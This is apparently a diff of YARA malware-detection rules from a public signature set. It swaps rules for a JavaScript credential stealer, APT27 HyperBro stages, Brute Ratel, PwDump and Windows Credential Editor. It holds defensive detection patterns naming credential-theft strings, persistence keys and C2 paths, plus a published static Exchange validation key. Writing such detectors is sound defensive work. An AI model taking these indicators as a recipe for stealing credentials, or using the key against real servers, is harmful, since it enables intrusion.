+		hash15 = "b2bac49288329a777e7aa7001e9383eec75719c08f2aa8c278b44fabeb74844f"
+		hash16 = "b772dce92319bb48df39db6ab701761bd7645a771fd7f394510d5951695e7e96"
+		hash17 = "c116cc4db6f77c580c1c4f8acda537ed04e597739bc83011773dbeb77adf93e3"
+		hash18 = "ca1b9026b5d69c0981ca088330180d4865602fc2b514fd838664d3e11eab4468"
+		hash19 = "d7a814d677f9f9dd9666dc4f4bb9cca88fa90bdb074e87006e8810eef9a0fb32"
+		hash20 = "e4acfb69006b8aecf5801e36e2c69ccfeea2e8cbad4ceda9228d2dae2c8fd023"
+		hash21 = "f9d6b894ca907145464058a4e2c78de84bf592609b46f3573bfd9e0029e1c778"
 
 	strings:
-		$s1 = "/tmp/qactg/" ascii
-		$s2 = "echo '/home/config/dscommands'" ascii
-		$s3 = "echo '/home/perl/DSLogConfig.pm'" ascii
-		$s4 = "ADM20447" ascii
+		$s1 = /\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)/
+		$s2 = /vl\-list\-\>string\s+\'\(\d+\s+\d+\s+\d+\s+\d+\s+\d+\s+/
+		$m1 = "strcat" nocase fullword
+		$m2 = "write-line" nocase fullword
+		$m3 = "open" nocase fullword
+		$m4 = /acad\w*\.lsp\"/ nocase fullword
+		$n1 = "vl-registry-write" nocase fullword
+		$n2 = "NOHIDDEN" nocase fullword
+		$n3 = "vlax-create-object " nocase fullword
 
 	condition:
-		filesize < 10KB and all of them
+		filesize < 1MB and uint8( 0 ) == 0x28 and ( 1 of ( $s* ) or all of ( $m* ) or all of ( $n* ) )
 }
-rule SIGNATURE_BASE_M_Hunting_Credtheft_WARPWIRE_1 : FILE
+rule SIGNATURE_BASE_HKTL_Bruteratel_Badger_Indicators_Oct22_4 : FILE
 {
 	meta:
-		description = "This rule detects WARPWIRE, a credential stealer written in JavaScript that is embedded into a legitimate Pulse Secure file."
-		author = "Mandiant"
-		id = "9a6a8783-b531-560d-998d-8aa7c90158a8"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L102-L120"
+		description = "Detects Brute Ratel C4 badger indicators"
+		author = "Matthew @embee_research, Florian Roth"
+		id = "a62d08ae-0fb3-55e9-b6f8-7940f8032e4a"
+		date = "2022-10-12"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/embee_research/status/1580030310778953728"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_bruteratel_c4_badger.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d0c7a334a4d9dcd3c6335ae13bee59ea"
-		logic_hash = "8029df5998166ab3db3319b0dd765ef3356b4b44dc16d2d418015a0f7ffac97e"
+		logic_hash = "9af05225f462c8d4ec1fb14dc06bb789f76b0d818cb82c3dfcd5abc693727f33"
 		score = 75
-		quality = 77
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}
-		$s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}
-		$s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}
-		$s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74}
-		$s5 = "Remember the last selected auth realm for 30 days" ascii
+		$s1 = { b? 89 4d 39 8c }
+		$s2 = { b? bd ca 3b d3 }
+		$s3 = { b? b2 c1 06 ae }
+		$s4 = { b? 74 eb 1d 4d }
 
 	condition:
-		filesize < 8KB and all of them
+		filesize < 8000KB and all of ( $s* ) and not uint8( 0 ) == 0x02
 }
-rule SIGNATURE_BASE_VUL_Exchange_CVE_2020_0688 : FILE
+rule SIGNATURE_BASE_Mal_Dropper_Httpexe_From_CAB : FILE
 {
 	meta:
-		description = "Detects static validation key used by Exchange server in web.config"
+		description = "Detects a dropper from a CAB file mentioned in the article"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1065f297-0dc4-5dcb-b0f3-c89d06ff5e69"
-		date = "2020-02-26"
+		id = "f67c13e9-67e7-56aa-8ced-55e9bb814971"
+		date = "2016-05-25"
 		modified = "2023-12-05"
-		reference = "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2020_0688.yar#L2-L15"
+		reference = "https://goo.gl/13Wgy1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_danti_svcmondr.yar#L10-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "035971028d36c8bbcc6a274817187adfbfefe530ff6808af5a7c0b4667c1bd8b"
+		logic_hash = "d114a3ab348bba49a78852b87b712908bc974bf35a2b841099a232e761cad8f2"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
 
 	strings:
-		$h1 = "<?xml "
-		$x1 = "<machineKey validationKey=\"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\"" ascii wide
+		$s1 = "029.Hdl" fullword ascii
+		$s2 = "http.exe" fullword ascii
 
 	condition:
-		filesize <= 300KB and $h1 at 0 and $x1
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_Crime_Win32_Ransom_Maze_Dll_1 : FILE
+rule SIGNATURE_BASE_Mal_Http_EXE : FILE
 {
 	meta:
-		description = "Detects Maze ransomware payload dll unpacked"
-		author = "@VK_Intel"
-		id = "873aea2b-2dd4-5682-b979-35e73fbc189f"
-		date = "2020-04-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1251388507219726338"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_maze_ransomware.yar#L1-L17"
+		description = "Detects trojan from APT report named http.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bcae9920-56ea-54a1-857b-70c275090e19"
+		date = "2016-05-25"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/13Wgy1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_danti_svcmondr.yar#L27-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b76636c05141687fa5cc507ac67d6a5d1f6c89166fd302e94fe61b412451159"
-		score = 75
+		logic_hash = "0e28b64bbfd2b6d40f4bd82373624d22df3d5c45c22d7155747f0ff33976207d"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
 
 	strings:
-		$str1 = "Maze Ransomware" wide
-		$str2 = "--logging" wide
-		$str3 = "DECRYPT-FILES.txt" wide
-		$tick_server_call = { ff ?? ?? 8b ?? ?? ?? ?? ?? ff d6 8b ?? 89 f9 50 ff ?? ?? ff d6 8d ?? ?? ?? 89 ?? ?? ?? 56 e8 ?? ?? ?? ?? 83 c4 04 b9 67 66 66 66 89 c5 f7 e9 89 d0 d1 fa c1 e8 1f 01 c2 8d ?? ?? 29 c5 56 e8 ?? ?? ?? ?? 83 c4 04 b9 56 55 55 55 89 c6 f7 e9 89 f9 89 d0 c1 e8 1f 01 d0 8d ?? ?? 29 c6 8b ?? 55 56 ff ?? ?? 85 c0 0f ?? ?? ?? ?? ?? 89 ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 c5 50 ff d3 89 c6 ff ?? ?? ?? ff d3 8b ?? ?? ?? 01 f0 3d ff 03 00 00 0f ?? ?? ?? ?? ?? 55 ff ?? ?? ?? 68 a2 95 c3 00 53 ff ?? ?? ?? ?? ?? 83 c4 10 c6 ?? ?? ?? c6 ?? ?? ?? ?? }
+		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
+		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
+		$x3 = "\\dumps.dat" ascii
+		$x4 = "\\wordpade.exe" ascii
+		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
+		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
+		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
+		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii
+		$s1 = "SELECT * FROM moz_logins;" fullword ascii
+		$s2 = "makescr.dat" fullword ascii
+		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
+		$s4 = "?moz-proxy://" ascii
+		$s5 = "[%s-%s] Title: %s" fullword ascii
+		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
+		$s7 = "Windows 95 SR2" fullword ascii
+		$s8 = "\\|%s|0|0|" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 3 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 2 of ( $s* ) ) ) or ( 3 of ( $x* ) )
 }
-rule SIGNATURE_BASE_EXPL_CVE_2021_31166_Accept_Encoding_May21_1 : CVE_2021_31166
+rule SIGNATURE_BASE_Mal_Potplayer_DLL : FILE
 {
 	meta:
-		description = "Detects malformed Accept-Encoding header field as used in code exploiting CVE-2021-31166"
+		description = "Detects a malicious PotPlayer.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d0a79cdc-f3ee-58f9-805c-ec9eb7993315"
-		date = "2021-05-21"
+		id = "71d34266-63e0-5a97-9a80-952be917641a"
+		date = "2016-05-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/0vercl0k/CVE-2021-31166"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2021_31166.yar#L2-L14"
+		reference = "https://goo.gl/13Wgy1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_danti_svcmondr.yar#L60-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bb5b4093a7abe9d4297a4c047803b92f7c08f56f15b0f7bd163203ae47e026d"
+		logic_hash = "1d1b68fa8de2e4ddfa71cbcd5e166181370172cc8a3167ade2da393e4f7998f1"
 		score = 70
-		quality = 60
-		tags = "CVE-2021-31166"
-
-	strings:
-		$xr1 = /[Aa]ccept\-[Ee]ncoding: [a-z\-]{1,16},([a-z\-\s]{1,16},|)*[\s]{1,20},/
-
-	condition:
-		1 of them
-}
-
-rule SIGNATURE_BASE_APT_RU_APT27_Hyperbro_Vftrace_Loader_Jan22_1 : FILE
-{
-	meta:
-		description = "Yara rule to detect first Hyperbro Loader Stage, often called vftrace.dll. Detects decoding function."
-		author = "Bundesamt fuer Verfassungsschutz (modified by Florian Roth)"
-		id = "b049e163-2694-5fb9-a3a3-98cc77bcd0ca"
-		date = "2022-01-14"
-		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L3-L19"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8785ea937891636bea5ed8128de44fa6084a1a48800c1586739c5ca9e4c43bd"
-		score = 75
 		quality = 85
 		tags = "FILE"
-		sharing = "TLP:WHITE"
-		hash1 = "333B52C2CFAC56B86EE9D54AEF4F0FF4144528917BC1AA1FE1613EFC2318339A"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
 
 	strings:
-		$decoder_routine = { 8A ?? 41 10 00 00 8B ?? 28 ?? ?? 4? 3B ?? 72 ?? }
+		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii
+		$s3 = "PotPlayer.dll" fullword ascii
+		$s4 = "\\update.dat" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and $decoder_routine and pe.exports ( "D_C_Support_SetD_File" )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or all of ( $s* )
 }
-
-rule SIGNATURE_BASE_APT_CN_APT27_Compromised_Certficate_Jan22_1
+rule SIGNATURE_BASE_Windowscredentialeditor
 {
 	meta:
-		description = "Detects compromised certifcates used by APT27 malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f2f015af-219d-51ab-9529-01687a879ebb"
-		date = "2022-01-29"
-		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L21-L34"
+		description = "Windows Credential Editor"
+		author = "Florian Roth"
+		id = "1542c6e4-36b2-5272-85d0-43226869b43e"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L20-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94a40d55936fc341eaba5e1accc8bfe3a401114298e7a3cc4d5c64af36eadf9e"
-		score = 80
+		logic_hash = "531a0bdc893d89b1c14deee11df95b430051cef07744a15b5d606e1c5378db97"
+		score = 90
 		quality = 85
 		tags = ""
-
-	condition:
-		for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert SHA2 Assured ID Code Signing CA" and pe.signatures [ i ] . serial == "08:68:70:51:50:f1:cf:c1:fc:c3:fc:91:a4:49:49:a6" )
-}
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Decrypted_Stage2 : FILE
-{
-	meta:
-		description = "HyperBro Stage 2 and compressed Stage 3 detection"
-		author = "Moritz Oettle"
-		id = "039e5d41-eadb-5c53-82cd-20ffd4105326"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L35-L57"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6eb56c4a92e89977e536ccc3c70170062aca072c6981b40aeea184ea2ca461a6"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
+		threat_level = 10
 
 	strings:
-		$lznt1_compressed_pe_header_small = { FC B9 00 4D 5A 90 }
-		$lznt1_compressed_pe_header_large_1 = { FC B9 00 4D 5A 90 00 03 00 00 00 82 04 00 30 FF FF 00 }
-		$lznt1_compressed_pe_header_large_2 = { 00 b8 00 38 0d 01 00 40 04 38 19 00 10 01 00 00 }
-		$lznt1_compressed_pe_header_large_3 = { 00 0e 1f ba 0e 00 b4 09 cd 00 21 b8 01 4c cd 21 }
-		$lznt1_compressed_pe_header_large_4 = { 54 68 00 69 73 20 70 72 6f 67 72 00 61 6d 20 63 }
-		$lznt1_compressed_pe_header_large_5 = { 61 6e 6e 6f 00 74 20 62 65 20 72 75 6e 00 20 69 }
-		$lznt1_compressed_pe_header_large_6 = { 6e 20 44 4f 53 20 00 6d 6f 64 65 2e 0d 0d 0a 02 }
+		$a = "extract the TGT session key"
+		$b = "Windows Credentials Editor"
 
 	condition:
-		filesize < 200KB and ( $lznt1_compressed_pe_header_small at 0x9ce ) or ( all of ( $lznt1_compressed_pe_header_large_* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3 : FILE
+rule SIGNATURE_BASE_HKTL_Amplia_Security_Tool : FILE
 {
 	meta:
-		description = "HyperBro Stage 3 detection - also tested in memory"
-		author = "Markus Poelloth"
-		id = "b4002777-f129-5177-a8f1-690012a207fa"
-		date = "2022-02-07"
-		modified = "2023-01-07"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L59-L84"
+		description = "Detects Amplia Security Tool like Windows Credential Editor"
+		author = "Florian Roth"
+		id = "4ad83f34-561d-53ce-9766-e21700354da7"
+		date = "2013-01-01"
+		modified = "2023-02-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L34-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49c1e70d63d93244b4b44525f2b30c05512b5f3a30d6d7c43c9366a95c84e79b"
-		score = 50
+		logic_hash = "7ca32d8df0011f23922c6566b28aa55b0756d5b67bf3db8908b206b1038bb1f2"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
+		nodeepdive = 1
 
 	strings:
-		$s1 = "\\cmd.exe /A" wide
-		$s2 = "vftrace.dll" fullword wide
-		$s3 = "msmpeng.exe" fullword wide
-		$s4 = "\\\\.\\pipe\\testpipe" fullword wide
-		$s5 = "thumb.dat" fullword wide
-		$g1 = "%s\\%d.exe" fullword wide
-		$g2 = "https://%s:%d/api/v2/ajax" fullword wide
-		$g3 = " -k networkservice" fullword wide
-		$g4 = " -k localservice" fullword wide
+		$a = "Amplia Security"
+		$c = "getlsasrvaddr.exe"
+		$d = "Cannot get PID of LSASS.EXE"
+		$e = "extract the TGT session key"
+		$f = "PPWDUMP_DATA"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( ( 4 of ( $s* ) ) or ( 4 of ( $g* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_C2
+rule SIGNATURE_BASE_Pwdump
 {
 	meta:
-		description = "HyperBro Stage 3 C2 path and user agent detection - also tested in memory"
+		description = "PwDump 6 variant"
 		author = "Marc Stroebel"
-		id = "d1fe03b9-440c-5127-9572-dddcd5c9966b"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L86-L100"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "676df1eaa782c6b876df138a0ddddc3c63e277b84d4414b044314ee219674420"
-		score = 50
-		quality = 81
-		tags = ""
-		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
-
-	strings:
-		$s1 = "api/v2/ajax" ascii wide nocase
-		$s2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" ascii wide nocase
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_Persistence
-{
-	meta:
-		description = "HyperBro Stage 3 registry keys for persistence"
-		author = "Marko Dorfhuber"
-		id = "2bb1d28b-5fc4-5f0b-b546-c8b8192b0d48"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L103-L117"
+		id = "e557e548-53e8-5098-93d4-8e899384e67c"
+		date = "2014-04-24"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L58-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db4b7be2bafe29b5e7c81a90e17a660cf73cff1c2e8edd04a9421daba09e3e0e"
-		score = 75
+		logic_hash = "a998d16f84e8689f182f6665ad165c6ff19e25d3e52acc10ca4cc6fe54ba354f"
+		score = 70
 		quality = 85
 		tags = ""
-		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
 
 	strings:
-		$ = "SOFTWARE\\WOW6432Node\\Microsoft\\config_" ascii
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\windefenders" ascii
+		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
+		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
+		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Encrypted_Stage2 : FILE
+rule SIGNATURE_BASE_Pscan_Portscan_1
 {
 	meta:
-		description = "HyperBro Encrypted Stage 2 detection. Looks for all possible one byte shifts of the lznt1 compressed PE header"
-		author = "Moritz Oettle"
-		id = "fa4fe057-4c3f-5785-a8d3-588398360996"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L120-L389"
+		description = "PScan - Port Scanner"
+		author = "F. Roth"
+		id = "54997776-644b-5a72-b08c-7174b7dc7f66"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L74-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c3b07bdb19730fc9c8cca8aa7581a32eb80e3dbc5c4d366fbb2f9966081c1a21"
-		score = 75
-		quality = 60
-		tags = "FILE"
-		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
+		logic_hash = "c624fcdf28506b551bf7b36883d95b279a7c56322337a0acafd91205659c92cc"
+		score = 50
+		quality = 85
+		tags = ""
 
 	strings:
-		$encrypted_pe_header_shift_0 = { fc b9 00 4d 5a 90 00 03 00 00 00 82 04 00 30 ff ff 00 }
-		$encrypted_pe_header_shift_1 = { fd ba 01 4e 5b 91 01 04 01 01 01 83 05 01 31 00 00 01 }
-		$encrypted_pe_header_shift_2 = { fe bb 02 4f 5c 92 02 05 02 02 02 84 06 02 32 01 01 02 }
-		$encrypted_pe_header_shift_3 = { ff bc 03 50 5d 93 03 06 03 03 03 85 07 03 33 02 02 03 }
-		$encrypted_pe_header_shift_4 = { 00 bd 04 51 5e 94 04 07 04 04 04 86 08 04 34 03 03 04 }
-		$encrypted_pe_header_shift_5 = { 01 be 05 52 5f 95 05 08 05 05 05 87 09 05 35 04 04 05 }
-		$encrypted_pe_header_shift_6 = { 02 bf 06 53 60 96 06 09 06 06 06 88 0a 06 36 05 05 06 }
-		$encrypted_pe_header_shift_7 = { 03 c0 07 54 61 97 07 0a 07 07 07 89 0b 07 37 06 06 07 }
-		$encrypted_pe_header_shift_8 = { 04 c1 08 55 62 98 08 0b 08 08 08 8a 0c 08 38 07 07 08 }
-		$encrypted_pe_header_shift_9 = { 05 c2 09 56 63 99 09 0c 09 09 09 8b 0d 09 39 08 08 09 }
-		$encrypted_pe_header_shift_10 = { 06 c3 0a 57 64 9a 0a 0d 0a 0a 0a 8c 0e 0a 3a 09 09 0a }
-		$encrypted_pe_header_shift_11 = { 07 c4 0b 58 65 9b 0b 0e 0b 0b 0b 8d 0f 0b 3b 0a 0a 0b }
-		$encrypted_pe_header_shift_12 = { 08 c5 0c 59 66 9c 0c 0f 0c 0c 0c 8e 10 0c 3c 0b 0b 0c }
-		$encrypted_pe_header_shift_13 = { 09 c6 0d 5a 67 9d 0d 10 0d 0d 0d 8f 11 0d 3d 0c 0c 0d }
-		$encrypted_pe_header_shift_14 = { 0a c7 0e 5b 68 9e 0e 11 0e 0e 0e 90 12 0e 3e 0d 0d 0e }
-		$encrypted_pe_header_shift_15 = { 0b c8 0f 5c 69 9f 0f 12 0f 0f 0f 91 13 0f 3f 0e 0e 0f }
-		$encrypted_pe_header_shift_16 = { 0c c9 10 5d 6a a0 10 13 10 10 10 92 14 10 40 0f 0f 10 }
-		$encrypted_pe_header_shift_17 = { 0d ca 11 5e 6b a1 11 14 11 11 11 93 15 11 41 10 10 11 }
-		$encrypted_pe_header_shift_18 = { 0e cb 12 5f 6c a2 12 15 12 12 12 94 16 12 42 11 11 12 }
-		$encrypted_pe_header_shift_19 = { 0f cc 13 60 6d a3 13 16 13 13 13 95 17 13 43 12 12 13 }
-		$encrypted_pe_header_shift_20 = { 10 cd 14 61 6e a4 14 17 14 14 14 96 18 14 44 13 13 14 }
-		$encrypted_pe_header_shift_21 = { 11 ce 15 62 6f a5 15 18 15 15 15 97 19 15 45 14 14 15 }
-		$encrypted_pe_header_shift_22 = { 12 cf 16 63 70 a6 16 19 16 16 16 98 1a 16 46 15 15 16 }
-		$encrypted_pe_header_shift_23 = { 13 d0 17 64 71 a7 17 1a 17 17 17 99 1b 17 47 16 16 17 }
-		$encrypted_pe_header_shift_24 = { 14 d1 18 65 72 a8 18 1b 18 18 18 9a 1c 18 48 17 17 18 }
-		$encrypted_pe_header_shift_25 = { 15 d2 19 66 73 a9 19 1c 19 19 19 9b 1d 19 49 18 18 19 }
-		$encrypted_pe_header_shift_26 = { 16 d3 1a 67 74 aa 1a 1d 1a 1a 1a 9c 1e 1a 4a 19 19 1a }
-		$encrypted_pe_header_shift_27 = { 17 d4 1b 68 75 ab 1b 1e 1b 1b 1b 9d 1f 1b 4b 1a 1a 1b }
-		$encrypted_pe_header_shift_28 = { 18 d5 1c 69 76 ac 1c 1f 1c 1c 1c 9e 20 1c 4c 1b 1b 1c }
-		$encrypted_pe_header_shift_29 = { 19 d6 1d 6a 77 ad 1d 20 1d 1d 1d 9f 21 1d 4d 1c 1c 1d }
-		$encrypted_pe_header_shift_30 = { 1a d7 1e 6b 78 ae 1e 21 1e 1e 1e a0 22 1e 4e 1d 1d 1e }
-		$encrypted_pe_header_shift_31 = { 1b d8 1f 6c 79 af 1f 22 1f 1f 1f a1 23 1f 4f 1e 1e 1f }
-		$encrypted_pe_header_shift_32 = { 1c d9 20 6d 7a b0 20 23 20 20 20 a2 24 20 50 1f 1f 20 }
-		$encrypted_pe_header_shift_33 = { 1d da 21 6e 7b b1 21 24 21 21 21 a3 25 21 51 20 20 21 }
-		$encrypted_pe_header_shift_34 = { 1e db 22 6f 7c b2 22 25 22 22 22 a4 26 22 52 21 21 22 }
-		$encrypted_pe_header_shift_35 = { 1f dc 23 70 7d b3 23 26 23 23 23 a5 27 23 53 22 22 23 }
-		$encrypted_pe_header_shift_36 = { 20 dd 24 71 7e b4 24 27 24 24 24 a6 28 24 54 23 23 24 }
-		$encrypted_pe_header_shift_37 = { 21 de 25 72 7f b5 25 28 25 25 25 a7 29 25 55 24 24 25 }
-		$encrypted_pe_header_shift_38 = { 22 df 26 73 80 b6 26 29 26 26 26 a8 2a 26 56 25 25 26 }
-		$encrypted_pe_header_shift_39 = { 23 e0 27 74 81 b7 27 2a 27 27 27 a9 2b 27 57 26 26 27 }
